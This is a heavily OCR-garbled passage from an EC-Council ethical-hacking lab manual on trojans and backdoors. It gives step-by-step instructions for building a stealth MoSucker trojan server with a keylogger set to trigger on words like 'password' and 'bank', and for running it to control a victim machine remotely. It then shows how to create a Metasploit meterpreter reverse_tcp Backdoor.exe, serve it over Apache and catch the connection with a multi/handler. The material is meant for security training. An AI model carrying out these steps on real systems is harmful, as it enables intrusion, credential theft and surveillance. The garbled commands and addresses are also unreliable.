J ! AY

Jl.

ft Downloads
'2Al

► GUI Trojans ►

j

Recent place}

^

Music

Q j Vid»oc
lOiterrc

fi

©

|

pi jg ns
screenshots
slons

j . stub

Documents

M Pictures

Search MoSuckcr

. runtimK

Ji

Libraries

Q

V | <‫| | צ‬

Firewall e/ents

Jl
04

‫ש‬

MoSuckcr

J tc g i

Desktop

■

Manage

Trcjans Types

Favorites

-<
‫׳‬

M oSucker

Applicator Tools

‫׳‬

Home

|

^

Crea:eServer.exe |
MoSjckerexe

j_] ReadMe.txt

1 it*m cel»rt#d 456 K2

FIGURE 1 .1 Install createServer.exe
0:
3.


1 1 the Open F ile - Secu rity W arning dialog box, click Run.
1



Open File ‫ ־‬Security Warning
software?

N m : ...T jan T e U T ja sM S ck rC a S rve x
a e
ro s yp sG I ro n o u e re te e r.e e
Publisher U n k n o w n Publisher
T e A plication
yp : p
F m Z EH M u 0 T ja sa dB c d o T ja sT
ro : :C v8 od le 6 ro n n a k o rsV ro n ...

S3

Rn
u

Cn l
a ce

T isfile d e n t h veavalid d sig atu thatverifies its
h
os o a
igital n re
p b e Y ush u onlyru so a fro p b e youtru
u lish r. o o ld
n ftw re m u lish rs
st.
H wc nI d ew atso areto ru ?
o a ecid h ftw
n
FIGURE 1 .2 Install cre S rve .e e
0:
ate e x x
£ / Tools
dem onstrated in
th is lab are
availab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and Backdoors

4.

The M oSncker Server Creator/Editor w indow appears, leave die default
settings and click OK.
MoSucker 3.0
Server Creator/Editor
Coded by Superchachi. Contains code from Mosucker 2.2 by Krusty
Compiled for Public release B on November 20/2002, VB6

(•

m

I w ant to c re a te a stealth trojan serv er for a victim
I- Indude Msvbvm60.dll in your MoSucker server (adds 750 KB)
17 Indude mswinsock.ocx in your server (adds 50 KB)
17 Pack for minimal file size

CD

Recommended! CD
CD

MoSudcer Transport Cipher Key

‫ש‬

TWQPQJL25873IVFCSJQK13761
V

Add

|

2385

‫ש‬

KB to the server.

(

I w ant to c re a te a visible serv er for local testing.
I w ant to edit an existing serv er

17

Start configuration after creating the server

About

Cancel

Ok

FIGURE 1 .3 Install createServer.ex
0:
e
5.

Use die file name server.exe and to save it 111 die same directory, click
Save.




&

MoSucker Server C reato r.

©

0

^

Organize
0

w

[

«

GUI Trojans ► M oSucker

Search M oSucker

N ew folder

*

D ocum ents

Date m odified

Type

i . AV Firewall events

9 /19 /20 12 1:37 PM

File foldeJ

X ci
g

9 /1 9 /2 0 1 2 1 :3 7 P M

File foldeJ

J

plugins

9/1 9 /2 0 1 2 1:37 PM

File foldeJ

X

runtimes

9 /1 9 /2 0 1 2 1 :3 7 P M

File foldeJ

J . screenshots

10/1 /20 12 6:56 PM

File foldeJ

X-

skins

9 /19 /20 12 1:37 PM

File foldeJ

J

stub

10/1 /20 12 6:50 P M

File foldeJ

Jp

CreateServer.exe

11/28/2002 2:59 A M

Applicatia

11/22/2002 5:10 PM

Apphcatio

N am e

J 1 Music
Pictures
8

Videos

H o m eg ro u p

: ■ C om puter
^

Local Disk ( C )

V

CEH -Tools ( 1 0 .
j g | M 0 Sucker.exe

^

N etw ork

File QameJ 5
Save as ty p e

Executable Files (*.exe)

Save

“■ H id e Folders

Cancel

FIGURE 1 .4 SaveServer.exe
0:

6.

M oSucker w ill generate a server w ith the com plete settings in die default
directory.
MoSucker 3.0

G
eneratingserver...
100% complete

Build D a te:
Build Info:

11/28/2002 2:04:12 AM
MoSucker 3.0 Public Release B

Level Accessed: Public UPX
V erifying n e c e s s a r y file p a th s
P re p a rin g fir s t s tu b
P re p a rin g s e c o n d s tu b
P ack in g fir s t s tu b
P ack in g s e c o n d s tu b
M odifying file h e a d e r s

FIGURE 1 .5 Install serverp g
0:
ro ress
7.

C lick OK 111 die Ed it Server pop-up message.
Edit Server 3.0
Server created successfully!
Server siz : 1 8K
e 5 B.
D not repackserver.
o

O
K
FIGURE 1 .6 Servercreatedsu
0:
ccessfu
l

1 1 the
1

M oSucker wizard, change die V ictinV s Nam e to V ictim or leave all

the settings as dieir defaults.



Module 06 - Trojans and Backdoors

MoSucker 3.0
Selected Server: |2:VCEHv8 Modde 06 Trojans and BackdoorsTrojans Type [

Nm ’ot
ae r
A
Password

Server ID:
Cypher Key:

[

Notificabon 1

Victim's Name:

f

Notification 2

Server Name(s):

Options

Extension^):
Conrectior-eort:

J<y 9 g
gjg 9 -

Close

0
‫ש‬
‫ש‬

1501704QWEYJC: 4264200TPGNDEVC
TWQPOJL25873IVFCSJQK13761
|vict!m

~]

kernel32,mscOnfig,winexec32,netconfig‫״‬

0

exe,pif,bat,dliope,com,bpq,xtr,txp,

‫ש‬

142381

‫ש‬

I * Prevent same server multi-infections (recommended)

You may select a windows icon to associate
with your custom file extension/s.

Fake Error

Rle Properties

Read

Save

FIGURE 1 Give dievictimm
0.7:
achine details
9.

N o w click K eylogge r 111 die le ft pane, and check die Enable off-line
ke ylo gg e r option, and dien click Save.

10. Leave die rest o f die settings as dieir defaults.
MoSucker 3.0
Selected Server: |z:CEHv8 Module 06 Trojans and BackdoorsTrojans Type [

Name/Port
Password

P I !Enable off-line keyioggetj

C ~ Close

[T]

Log Filename:

‫ש‬

monitor.log

Options

1 Enable Smart Logging
‫־‬
Captwn key words to trigger keylogger (separate each with a comma)

‫ש‬

hotmad,yahoo',login‫׳‬password,bankfsecurefcheckoutfregister,
Keylogger
Plug-ns^ 1
<1
Fake Error
Fde Properties

Read

Save

FIGURE 1 .8 Enable the keylogger
0:
11. C lick OK 111 die EditServer pop-up message.
MoSucker EditServer 3.0

o

Server saved successfully.
Final server size: 158 KB

OK

FIGURE 1 .9 S
0 : erver sa file
ve

C EH Lab Manual Page 510

Ethical Hacking and Countenneasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Stricdy Prohibited.


12. N o w switch to W indow s Server 2008 V irtu a l M acliine, and navigate to
Z:CEHv8 M odule 06 Trojans and BackdoorsVTrojans TypesGUI
TrojansM oS ucker to run die server.exe tile.

3

2

^

- j*
Jp 1
Si H I

Pit

Edl

Vtew
*

~odi

•tep

Virnt

©

*

■ -H
»
»

favorite Links

i AVFrmsI een3

I- ‫■־‬
■
°
■

I i*co

£ Pitres
1 M*
• l

4

| .^a‫־‬e
v 1
•
.1

— ^viSvcce'.sxe
*

_________________________I
l__ ^ ^
FIGURE 10.10: click server.exe
13. D ouble-click server.exe 111 W indow s Server 2008 virtual macliine, and click
Run 111 die Open File - S e cu rity W arning dialog box.
x1
1

Open File - Security Warning
The publisher could not be verified. Are you sure you want to
run this software?
Name: .. .sT 1ojans TypesGUI TrojansV'loSucker'!server.exe
r
Publisher:
Type:

U k o nP b e
n n w u lish r
Application

From: Z : CEHv8 Module 06 Trojans and BackdoorsT 1o ja n ...
r

Run

‫.ן‬

f!

Cancel

How can I decide what software to run ‫ל‬

FIGURE 10.11: Click on Run
14. N o w switch to W indow s 8 V irtu a l M acliine and navigate to Z:CEHv8
M odule 06 Trojans and BackdoorsVTrojans TypesGUI TrojansM oS ucker
to launch M oSucker.exe.
15. D ouble-cl1ckM oS ucker.exe.


Ethical Hacking and Countermeasures Copyright © by EC-Council


K W ‫־״‬
1 1 Ibm c Share View‫׳‬
1
[©(1 (*‫ * ־‬t‫*״‬jnj Types
♦
i»
K

Desktop

<«
K
>

Manage
► GUI Trojans ► MoSucker

AY F rewa 1e/ents

-{ Favorite

M oSucker

-pp11:a to r took

v

C |Scorch MoSuckcr

fi |

- J! 5erver.exe

M c9

6Downloads

J

ffil Rccent plates

p ljg ns

1 runtim e
£ saeensnocs
^ slons

^gi Libraries

stub

H ] Documents

$ C rea:eServer.exe

Music
[K J Pictures

^M oSudem e]

!HI Videos

j | ReadMe.txt

1 items
1

1 item selerted 3.08 MB

£

5,

FIGURE 10.12: dick on M
osuker.exe
16. 1 1 the O pen File —Security W arning dialog box, click Run to launch
1
MoSucker.
Open File - Security Warning
The publisher could not be verified. Are you sure you want to run this
software?

S3

Name:

...rsVTrojans TypesGUI TrojansMoSuckerMoSucker.exe

Publisher Unknown Publisher
Type:

Application

From: Z:CEHv8 Module 06 Trojans and BackdoorsVTrojans T...

Run

Cancel

How can I decide what software to run?

FIGURE 10.13: Run die applicatin
17. The M oSucker main w in d o w appears, as shown 111 die fo llo w in g figure.

10.0.012
Misc stuff
Infotmation
File related
System
Spy related
Fun stuff I
Fun stuff II
Live capture

][10005

J

u iiu u i.m o s u c h c r . t K

*

0G

FIGURE 10.14: M
osucher m window
ain




18. E nter tlie IP address o f die v ic tim and p o rt num ber as you noted at die time
o f server configuration, and dien click Connect.
19. 1 1 tliis lab, we have noted W indow s Server 2008 virtual machine’s IP
1
address (10.0.0.13) and p o rt number: 4288.
N ote: These m ight d iffe r 111 your classroom labs.

FIGURE 10.15: connect to victimm
achine
20. N o w die C onnect button automatically turns to D isconnect after getting
connected w id i die v ic tim machine as shown 111 the follo w in g screenshot.

version 3.0

FIGURE 10.16: connectionestablished
21. N o w click M isc s tu ff 111 die le ft pane, w hich shows different options fro m
w h ich an attacker can use to perform actions fro m liis or her system.




'‫׳‬A bout

_ |

I& T ools
dem on stra te d in
th is lab are
a va ilab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and B ackdoors

FIGURE 10 7 settingserver options
.1 :
22. Y o u can also access the v ic tim ’s machine rem otely by clicking Live ca p tu re
111 the le ft pane.
23. 1 1 the Live ca p tu re o p tion click S tart, w hich w ill open the remote desktop
1
o f a v ic tim ’s machine.
‫ ׳‬A b o u t'

| 4288 1 Disconnect 1 Options ] s g
1
1
Misc stuff
Information
File related
System
Spy related
Fun stuff I
Fun stuff II
Live capture
Start
Settings

JI&

_

~x]

Q

make screenshot

Make screenshot
JPEG Quality:

*
•
•
•

20%
30%
40%
50%

•
•
•
O

60%
70%
80%
90%

&

oi£

FIGURE 10.18: start capturing
24. The remote desktop connection o l die v ic tim ’s machine is shown 111 die
fo llo w in g tigiire.


Ethical Hacking and Countemieasures Copyright © by EC-Council


Remote administration mode

sssei sssa&i
RA mode options
Resi2 windo-v to 4:3
e
JPG Quality 1
Delay in ms |

W
W
W
V

'▼
1000

Send mouseclicks
Send pressed keys
Send mousemoves
Autollpdate pics

U

Fullscreen

FIGURE 10.19: capturingvictimm
achine
25. Y o u can access tiles, m o d ify die files, and so on in dns mode.

RA mode options

r

*

Rem10te administration mode

w

*>

Resize window to 4:31

W
W
1
“

W

▼j

I j

Delay in ms |

1 !

JP G Quality 1
90%
1000

Send mouseclcks
Send pressed Leys
Send mDusemoves
Autollpdate pics
Fullscrccp

J

____

^ :T t- o w
n .a c
E K‫־‬
1«

C‫־־‬
f■
c*

& Z Z

-----

Crcre:5FHB
► * *‫י־יי־‬
■
o
® 1• M
1

o;

FIGURE 10.20: capturingvictimm
achine
26. Similarly, you can access die details o f die v ic tim ’s machine by clicking die
respective functions.

L a b A n a ly s is
Analyze and docum ent die results related to die lab exercise. G ive your opinion on
your target’s security‫ ״‬postare and exposure through public and free inform ation.




P L E A S E T A L K T O Y O U R IN S T R U C T O R IF Y O U H A V E Q U E S T IO N S
R E L A T E D T O T H IS L A B .

T o o l/U tility
M osucker

In fo r m a tio n C o lle c te d /O b je c tiv e s A c h ie v e d
O u tp u t:
R ecord the screenshots o f the v ic tim ’s m achine

Q u e s t io n s
1.

Evaluate and examine various methods to connect to victim s i f they are 111
different cities o r countries.

□ Y es

0 No

P la tfo r m S u p p o rte d
0 C la s s ro o m


0 !Labs



H a c k W in d o w s 7 U s in g M e ta s p lo it
M etasploit Fra wen ork is a toolfor developing and executing exploit code against a
remote target machine.
I CON

KEY


Z^7 Valuable[
information____

Large com panies are co m m o n targets fo r hackers and attackers o f various kinds

. * Testyour
‫י‬
‫׳‬
knowledge_____

and fro m th e ir critica l I T in frastructure. Based 011 the fu n c tio n a lity o f the
T ro ja n w e can safely surmise th a t the in te n t o f the T ro ja n is to open a backdoor

e W eb e e c s *
xrie

011 a co m prom ised com puter, allo w in g a rem ote attacker to m o n ito r a ctivity and

Q Workbook review£

steal in fo rm a tio n fro m the com prom ised com puter. O nce installed inside a
corporate n e tw o rk , the backdoo r feature o f the T ro ja n can also allo w the

and it is n o t u n c o m m o n fo r these companies to be actively m o n ito rin g tra ffic to

attacker to use the in itia lly co m prom ised co m p u te r as a springboard to launch
fu rth e r forays in to the rest o f the in fra stru ctu re , m eaning th a t the w ealth o f
in fo rm a tio n that m ay be stolen could p o te n tia lly be far greater than th a t existing
011 a single m achine. A basic p rin c ip le w ith all m alicious program s is that they
need user su p p o rt to do the damage to a com puter. T h a t is the reason w h y
T ro ja n horses try to deceive users by show ing them some o th e r fo rm o f email.
B a ckdo o r program s are used to gam unauthorized access to systems and
backdo o r softw are is used by hackers to gain access to systems so that they can
send 111 the m alicious softw are to that p a rticular system. Successful attacks by
the hacker 01‫ ־‬attacker in fe c tin g the target e n viro n m e n t w ith a custom ized
T ro ja n horse (backdoor) determ ines exploitable holes 111 the cu rre n t security
system.
Y o u are a security ad m in istra to r o f y o u r com pany, and y o u r job responsibilities
include p ro te c tin g the n e tw o rk fro m T rojans and backdoors, T ro ja n attacks,
th e ft o f valuable data fro m the n e tw o rk, and id e n tity the ft.
& T ools
d e m o nstra te d in
th is lab are
a va ilab le in
D:CEHToolsCEHv8
M odule 06 Trojans
and B ackdoors


T he objective o f tins lab is to help students learn to detect T ro ja n and backdoor
attacks.
T he objectives o f the lab include:
■

C reating a server and testing the n e tw o rk fo r attack



■

A tta c k in g a n e tw o rk using sample backdoo r and m o n ito r the system
a ctivity

T o cany tins out, you need:
■

A com puter running W indow S erver 2012

‫י‬

B a c k tra c k 5 r3 running in V irtu a l m achine

■

W indow s7 running 111 virtual machine (V ictim machine)

■

A w eb browser w ith In te rn e t access

■

A dm inistrative privileges to nan tools

Tim e: 20 M inutes

O v e r v ie w


A T rojan is a program that contains m a lic io u s o r harm ful code inside apparently
harmless program m ing o r data 111 such a way that it can g e t c o n tro l and cause
damage, such as ru in in g die hie allocation table on a hard drive.

Lab T ask s
s d

T

A

S

K

1

C reate Sever
C onnection

1.

Start B a c k T ra c k 5 virU ia l m achine.

2.

O pe n the te rm in a l console by navigating to A p p lic a tio n ^

B a c k T ra c k

‫ ^־־‬E x p lo ita tio n T o o ls ‫ ^־־‬N e tw o rk E x p lo ita tio n T o o ls ‫ ^־־‬M e ta s p lo it
F ra m e w o rk ‫ ^־־‬m s fc o n s o le
,y Applications Places System |
Accessories
^

d

L
IUC Oct 231 0:03 ‫ ״‬AM

►

Backltack

:

, f Graphic*

‫ !*> ׳‬Oathefing

Vulnerability Assessment

Internet

►
► . K Network Exploitation Tbols

‫ .! > ־׳‬Cisco Attacks

►

i l l Office

► ^

‫> </ ״‬
§

► .1 . Fast-"H‫־‬
ack

►

^

► B Maintaining Access

» ^

Database Expl• ^

armitage

iH

!^ ‫ ״‬Sound & Video

Openyour term
inal
(CTRL + ALT +1) 31 type
1d
m
sfvenom-h to viewthe
availableoptions for diis tooL

► ■0 Exploitation Ibols

►

»

W ireless Explo ^

m sfdi

if-. SAP Exploitation

f l f System Tools

► ^

RFID Tools

► 9

Social Engmee ^

msfconsole

^

5

► a

Stress Testing

‫־״‬

Physical Explo ^

msfupdate

►

Open Source E 3b. start msfpro

Other

Wine

Pnvilege Escalation

Reverse Engineenng

r f - Forensics
^
jP

?

Exploitation Tools

Reporting Tools

M etasploit Framework

►
»

isr-evilgrade
netoear-telnetenable
term ineter

V

Services
Miscellaneous

<<

*

m

_

‫—׳‬

‫י‬

,

‫כ‬

‫א‬

back track

[Create Sim ple Exploit...


Ethical Hacking and Countenneasures Copyright © by EC-Council
AH Rights Reserved. Reproduction is Stricdy Prohibited.


FIGURE 11.1: Selecting msfconsole from metasploit Framework
T ype the fo llo w in g com m and 111 m sfconsole: m s fp a ylo a d
w in d o w s /m e te rp re te r/re v e rs e tc p LH O ST=10.0.0.6 X >
D e s k to p /B a c k d o o r.e x e and press E n te r

3.

N ote: T h is IP address (10.0.0.6) is B ackTrack machines. These IP addresses
m ay vary in y o u r lab environm en t.

I I

BackTrack on WIN-D39MR5HL9E4 - Virtual Machine Connection
File

«

Action

Media

3 ® S 0

Clipboard

View

Help

II 1 fe 1
►
C
j

Applications Places system ‫ם‬

152 TUe0Ct23. 3:32 PM

I File Edit View Terminal Help

3K0a SuperHack I I

Logon

xracK
» [ m e ta s p lo it v 4 .5 .0 dev [ c o r e : 4 b a p i: 1.0]
- 927 ]=‫ ״‬e x p lo it s • 499 a u x ilia r y - 151 post
- 251 ]=‫ ־ ־‬payloads • 28 encoders - 8 nops

y

; > jn sfp ayload w in d o w s/ n e te rp rete r/ re ve rse tcp LHOST-1O.0.0.6 X > Desktop/Backdoor

FIGURE 11.2: CreatingBackdoor.exe
4.
Metasploit
Framework, a tool
for developing and
executing exploit
code against a
remote target
machine

T in s co m m and w ill create a W in d o w s e x e c u ta b le file w ith name the
B a c k d o o r.e x e and it w ill be saved on the B ackTrack 5 desktop.

‫--------------ד׳‬J File

Action

Media

Clipboard

V!*w

BackTrack on W1N-D39MRSHL9E4 - Virtual Machine Connection

H«lp

it 0 ® @ g ■ !‫ ן‬it fe
^

Applications Places System

U

1ue OCt 23. 11:53 AM

A

Backdoor.exe

< back I track
<
ja a j

,Vi

FIGURE 11.3: Created Backdoor.exe file
5.

N o w you need to share B a c k d o o r.e x e w ith yo u r v ic tim m achine
(W indow s 7), by fo llo w in g these steps:




6.

O p e n a new B a c k T ra c k 5 te rm in a l (CTRL+ALT+T) and then nan this
com m and m k d ir /v a r/w w w /s h a re and press E n te r to create a new
d irector}‫ ״‬share.

To createnewdirectory
sharefollowing com andis
m
usedmkdir /var/www/share

FIGURE 11.4: sharing the file
7.

Change the m ode fo r the share fo ld e r to 755, by entering the com m and
c h m o d -R 755 /v a r/w w w /s h a re / and then press E n te r
BackTrack on W1N-D39MRSHL9E4 - V irtua l M achine C onnection
File

Action

Media

Clipboard

View

T=TB"■

Help

<910 (■ @O II It fe ,
)
Applications Places System □

d

FT

■Rie Oct 23.12:03 Pf/

.f t
Backdoor.exe
•
* ‫׳י‬
>

‫א‬

ro o t^ b t: —

File Edit View Terminal Help

1.
-

ra d r A / ><share
<1
»*/

^oot$»i ‫ - ־‬k chaod •R 755 /var/*ww /share/ |

‫י‬I

c a To changedie m of
ode
sharefolder usethe following
com and:chm -R*
m
od
/var/www/share/

<< back I track

5

‫״‬a i
FIGURE 11.5: sharing the file into 755

8.

Change the ow nership o f that fo ld e r in to w w w -data, by entering the
com m and c h o w n -R w w w -d a ta :w w w -d a ta /va r/w w w /s h a re / and then
press Enter.




Fil• Action

Midi•

Clipboard M w

Hilp

It >® @0 II It >
»
Applications Places system ( * ]

'

d

v

k

I

1ue o c t 23. 12:0‫ צ‬PM

r o o t ^ b t : ‫־־‬

ile Edit View Terminal Help
‫׳‬otg fet:‫ * ־‬n k d ir /var/www/share
'2 i . l l L . ■ TT; i
‫■־‬
■ot'jbt:-♦ cnown •R www d a ta :www d a ta /var/wwv/stmrc/

To change
ow n e rsh ip of
fo ld e r in to w w w ,
use th is com m and
ch ow n -R w w w data
/var/w w w /share/

.

back I track

<<

5

FIGURE 11.6: Change the ownership of the folder
9. T ype the com m and Is -la /v a r/w w w / | grep sh a re and then press E n te r
BackTrack on W1N-D39MR5HL9E4 - Virtual Machine Connection
File

Action

Media

•it 3 ® @
0

Clipboard

View

'- !°‫*־׳‬

Help

II It &

Applications Places system (>‫ך‬

‫׳‬s

d

v

x

[>< 1ue OCt 2 3 .1
-:

ro o t^ b t -

Tile Edit View Terminal Help
ro o t^ b t:- *
ro o tg b t:- #
'c -~
ro c t^ b t:- »

n k d ir / v a r/ w w /s h a re
chaod -R 755 / va r/ w w /s h a re /
chowr -R w » data:wuw d a ta / v a r/w w /stm re/
I s - la / va r/ w w / | grep s h a r e |

<< back I track

5

-03
FIGURE 11.7: sharing die Backdoor.exe file

10. T he n e xt step is to start the A p a c h e s e rv e r by typ in g the s e rv ic e
a p a c h e 2 s ta rt com m and 111 the term inal, and then press Enter.




Fil• Action

Midi*

It >® @0

CI1pbo»rd

V!**

Htfp

II 1 >
►»

Applications Places system (‫] י‬

‫י׳‬

a

‫׳י‬

‫א‬

I

1UC CCt 23. 12:07 PM

ro o t^ b t: —

File Edit View TSfrminal Help
ro o tjab t:‫ # ־‬n k d ir /var/www/share
rootjab t:-* ch«od -R 755 / va r/ w w /s h a re /
r o o tg b t:'♦ chowr ■R v m data:www d a ta /var/wwv/shar<
rootg bt:-♦ I s - la / v a r/ w w / | grep share
drwxr-xr-x 2 www-data w w - d a ta 4096 2012-10-23 12■
A
-pet :c l:- ♦ s e r v ic e apache2 s t a r t |
* S t a r t in g web s e r v e r apache2
h ttp d (p id 3662) a lr e a d y running

‫י‬

A

back I track £

<<

-03.
& T o run the
apache w e b server
use th e fo llo w in g
com m and:
cp
/root/.m sf4/data/ex
p lo its /*
/var/w w w /share/

FIGURE 11.8: Starting Apache Webserver
11. N o w y o u r A pache w eb server is ru n n in g , copy the B a c k d o o r.e x e tile
in to the share folder. Type the fo llo w in g com m and cp
/ro o t/D e s k to p /B a c k d o o r.e x e /v a r/w w w /s h a re / and press E n te r
BackTrack on W1N-D39MRSHL9E4 - V irtua l M achine C onnection
File

Action

Media

Clipboard

View

« I©® ©a 1 !■r»
1»

‫ד « ח ״ן ־ן‬

Help

,

A

Backdoor.exe
‫־״־‬

v‫׳‬

x

r o o t 'J b t : ~

R le Edit View Terminal Help
rootstot:-# n k d ir / v a r/ w w /s h a re
root0b t :-41 chaod -R 755 / va r/ w w /s h a re /
ro o t§ b t:~ # chown r m/m data:w vw d a ta /var/w w vr/sh ar• /-.^
ro o tp b t:*# I s - la /war/mm/ | grep share
d r w x r - x r x 2 v/^v d a ta ww#r d a ta 4096 2612 JQ-21 n ! n 1 utm
r o o t 0 b t :* f s e r v ic e apache2 s t a r t
• S t a r t in g web s e r v e r apache2
h ttp d (p ld 360?) a lr e a d y running

rootflbt:-* cp/root/Desktop/Backdoor.exe /var/www/share/
L i J l : O ii : 111:1
1■■U
,
. ! : a l . tiu - u l : . f l . L LL i i i 11:1.
‫י‬
cp /root/Pe> kt9p/Bdckdoor.exe /var/www/shdie/

<< back I track
‫יו‬
1 Status: Running

FIGURE 11.9: Running Apache W server
eb
12. N o w go to W in d o w s 7 V irtu a l M achine, open F ire lo x o r any w eb
brow ser, and type the U R L h ttp ://1 0 .0 .0 .6/s h a re /111 the URL field and
then press E n te r
N ote: H ere 10.0.0.6 is the IP address o f B ackTrack; it may vary 111 yo u r
lab environm ent.




‫י‬

Windows 7 on W1N-D39MR5HL9E4 - Virtual M a r in e Connection
Fil• Action

Media

Clipboard

V!**

‫> (יי) 0 »׳‬Q n 1 ;e0
!
►f

Halp

Indtx of /thaw ’

a ac1 .0 .6
h ' ' 0 .0

C
G«ttin9 $U11*d i..i Su99«a«d SiUt

l£1 MottVniUd

*11‫ ־‬GopfJe

-

=' ‫ ־‬te
‫׳‬
■
‫* °׳‬

D B»knw I

W«b 9 <■041ay

Index o f/s h a re
N am e

L a s t m ud ilit-d

S u e D e scrip tio n

Parent Directory
23- 0 c t- 2 0 12 12:12 7 2 K

Apache/2.2 .14 (Ubtmru) Server a t 1 0 0 .0 .6 P o rt SO

BaikTratj^^VI■ J
^

W
indow^o^fl,

FIGURE 11.10: Firefox web browser with Backdoor.exe
13. D o w n lo a d and save die B a c k d o o r.e x e tile 111 W in d o w s 7 V irtu a l
M achine, and save d iis file o n die desktop.
If you d id n 't
have apache2
in sta lle d , run aptg e t in s ta ll apache2

HZ ‫י‬
Action

Media

Clipboard

View‫׳‬

Help

1 ® @0 ri i• fe •
0
s 5

C EH

Certified

Ithical Hacker

•nu
Unjl*

w
FIGURE 11.11: S
aved Backdoor.exe on desktop
14. S w itch back to the B a c k T ra c k m achine.
15. O pe n the M e ta s p lo it console. T o create a handler to handle the
co n ne ctio n fro m v ic tim m acliine (W indow s 7), type the com m and use
e x p lo it/m u lti/h a n d le r and press E n te r




£0 The exploit will be saved
on
/ root/.msf4/data/exploits/
folder

Fil• Action
It

> ®

Midi•

CI!pbo»rd

@ 0

II

It

V!**

Htfp

>»

Applications Placcs system
‫י׳‬
Bnckdoor.e

v

A

I

1UC OCt 23. 12:30 PM ,

x !term in al

f '1 Edlt V1ew Terminal Help
*

! ( .‫־‬
•‫/ * ״‬
n sf > n sfp ayloa d w1 ndows/‫ »׳‬e t e r p r e t e r / re v e rs e tc p LH O SW 9 7T 1m 7 b.9 1 X^Ogfefetop/Backdoor.exe
[ * ] ex ec: n sfp ay lo a d w in d o w s / r e t e r p r e t e r / re v e r s e t c p LHOST-192. I$ a- e 0 ?9 ix > C ^ g w ^ ^ j d o o r

C reated by n sfp ay lo a d ( h t t p :/ A A M . n e t a s p lo i t .c o n ).
Pay lo a d : windows/met e r p r e t e r / r e v e r s e tc p
L en g th : 290
O p tions: ("LHOST192 .1 68 .8 .91 ■ := ">
< *‫־‬
n sf > use e x p lo it / n u lt i/ h a rK f le r |
n sf e x p lo it (h a n d le r) >

%

<< back I track
FIGURE 11.12: Exploit the victim m
achine
16. T o use the reverse T C P , type the com m and s e t pa ylo a d
w in d o w s /m e te rp re te r/re v e rs e _ tc p and press E n te r
•‫ן ז « ׳ ״׳‬

File

Action

Media

<01 ® e e
0

Clipboard

View

Help

1 it ‫ ן‬h *>
1

Applications Places system

£ [y 1u O 23. 12:36 PM ,
j >, e Ct

Backdoor.J Fl|e Edit View Terminal Help

U To set reverseTCPv e
=U
is
the following com and set
m
payload
windows/m
eterpreter/reverse
- tcP

msf > tisfp ayload w in d o w s/ n e te rp re te r/ re ve rse tc p L H O ST 1 9 2 .168.8.91‫־‬
[*1 ex ec: n sfp ay lo a d w ln d o w s / re te rp re te r/ re v e rs e tcp LH0ST=192.J68.8

I

!esktop/Backdoor.exe
^ *jp e s k top /Ba c kd 00 r

Created by n sfp ay lo a d ( h t tp :/ / M M .n e t a s p lo it .c o n ) .
Pay lo a d : w ind ow s/m e te rprete r/re ve rse tc p
Length: 290
Opt io n s : { ‫־־‬LHOST"->" 192.168 8 .9 1 ‫> ״‬
B S l > use e x o lo lt/ B u ltl/handler

il

f
;f/
^

nsf e x p lo it(handler) >jset payload windowi/meterpreter/reveise tcp I
pay I on d -> windows/mete rpmvr7TPVPrCT‫ ־‬rrp
1
flfcf exploit (h a n d le r ) >

< back I track 5
<
FIGURE 11.13: Setup die reverse TCP
17. T o set the local IP address th a t w ill catch the reverse connectio n, type
the co m m and s e t Ih o s t 10.0.0.6 (B a c k T ra c k IP A d d re ss) and press
E n te r




BackTrack 0‫ ח‬WIN-D39MR5HL9C4 - Virtual Machine Connection
Fil• Action
•it

9 (•)

Midi*
© 0

Clipboard

Vi**

H*lp

M l* •

Applications Placcs system (* J

d

I

HJC o ct 23. 12:40 PM

15 r A v * T ro a
/ I
fcr inl
Bnckdoor.J File Edit View Terminal Help

! n i l > is fp a y lo a d wind01r fs / » e te rp re te r/ re v e rs e _ tc p 1H0ST-192.1 68.8.91 X > Oesktop/Backdoor.exe
| [+ j exec: m sfpayload w in d o w s/ n e te rp re te r/ re ve rse tcp LHQST-192.168.8.91 X > Desktop/Backdoor.!

Created by rasfpayload ( h T tp :/ / w w x .n e ta sp lo it.c o « 1)._ — ""
Pay lo a d : w in d o vs / m e te rp re te r/ re ve rs e _tcp
Length: 298
o p tio n s : {"LH05T“ =>"192. 1 68.8.91*}
msf > use e x p lo .it/ 11u lt i/ h a n d le r
msf e x p l o i t ( h a n d le r) > s e t paylo ad w m d o w s / n ete rp rete r/re ve rs e tc p
payload => w indow s/neterp re T e r/ re y e rs e tco
msf e x p lo it (h a n d le r) > |set Ih o s t 1 8 .6 .S .6 |
Ih o s T => 1 0 . 6 . 0 . 6
e x p l o i t ( h a n d le r ) >_________________________________________________________

<< back I track
58a.
FIGURE 11.14: set the lost local IP address
18. T o start the handler, type the com m and e x p lo it -j - z and press E n te r

I I 1

BackTrack on W1N-D39MR5HL9£4 - Virtual Machine Connection
File

Action

Media

Clipboard

» ‫^ •! >@ ® נ‬
11 »

View

Help

a

j

Applications Places system [>
^j

TUe OCt 23.12:44 PM

^

■ | ‫■־״™״יי< “ ־‬
/4t ‫י‬
Backdoor.d File Edit View Terminai Help

C reated by n sfp ay lo a d ( h t t p :/ / w w . n e t a s p lo it . c o n ) .
P a y lo a d : windows/meterp r e t e r / reve rse tc p
Length: 298
O p tions: { ‫־‬
,IHOST■
‘=>•'192.168.8.91‫} ״‬
msf > use e x p lo it / n u lt i/ h a n d le r
msf e x p lo it (h a n d le r) > s e t paylo ad w ind ow s/n e te rp ret
payload => w in d o w s/ rie terp re ter/ reve rs e tcp
msf e x p lo it (h a n d le r ) > s e t Ih o s t 1 8 .8 .8 .6
Ih o s t - > 1 0 .0 .0 . 6
j
msf e x p l o i t ( h a n d le r) > !e x p lo it -j - 1 1

I* ] Exp loit running as background job
[ - I S t a r t e d re v e rs e h and ler on 18.0 .6 .6 :4 44 4
I ‫״־‬I S t a r t in g the payload h a n d le r ...
msf e x p lo it (h a n d le r) > I

< back I track 5
<
FIGURE 11.15: Exploit the windows 7 m
achine
19. N o w sw itch to the v ic tim m a c h in e (W indow s 7) and d o u b le -click the
B a c k d o o r.e x e file to ru n i t (w hich is already dow nloaded)
20. A g ain sw itch to the B ackT rack m achine and yo u can see the fo llo w in g
figure.




!- ,“ ‫י * י‬

Filt

•it

Action

M#di*

CI1
pbo»rd

S (•) @ O

II

Vi•*

Htfp

1► * »

^

/

a

v

d M: TUcoct23. 3:02 pm ,

x ‫־‬
!terminal

File Edit View Terminal Help

Back( ♦ " *‫ “־‬I 927 exploits • 499 a u x ilia ry • 151 post
